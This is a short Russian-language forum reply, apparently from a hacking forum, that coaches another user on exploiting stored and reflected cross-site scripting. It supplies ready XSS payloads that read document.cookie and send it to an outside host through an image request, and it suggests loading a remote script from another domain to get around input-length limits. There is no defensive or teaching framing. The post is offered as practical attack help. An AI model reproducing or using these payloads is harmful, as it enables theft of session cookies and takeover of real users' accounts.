не надо не чего скачивать все проги имеют свой алгоритм..лишь твоя голова имеет конструктор алгоритмов.
Ты не написал это активная или пассивная XSS

1) Если активная блин то скорее всего есть проверка на конец строки чтобы было расширение тогда попробуй
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> /1.jpg
и вообще это тупо...юзай готовые тэги и их динамические параметры или высший пилотаж в активных XSS енто вложенные тэги.

Если ты указал пассивную XSS тогда скорее всего идёт проверка на длину строки переменной.
больше симолов н е чем отведенно под неё не вставишь.
Поэтому лучший тут выход будет юзать скрипт с другого ресурса.
к примеру вставить:
<script src=http://qwe.ru/1.js></script>

а на сайте http://qwe.ru/ в 1.js вставить скрипт передачи кукисов:

img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;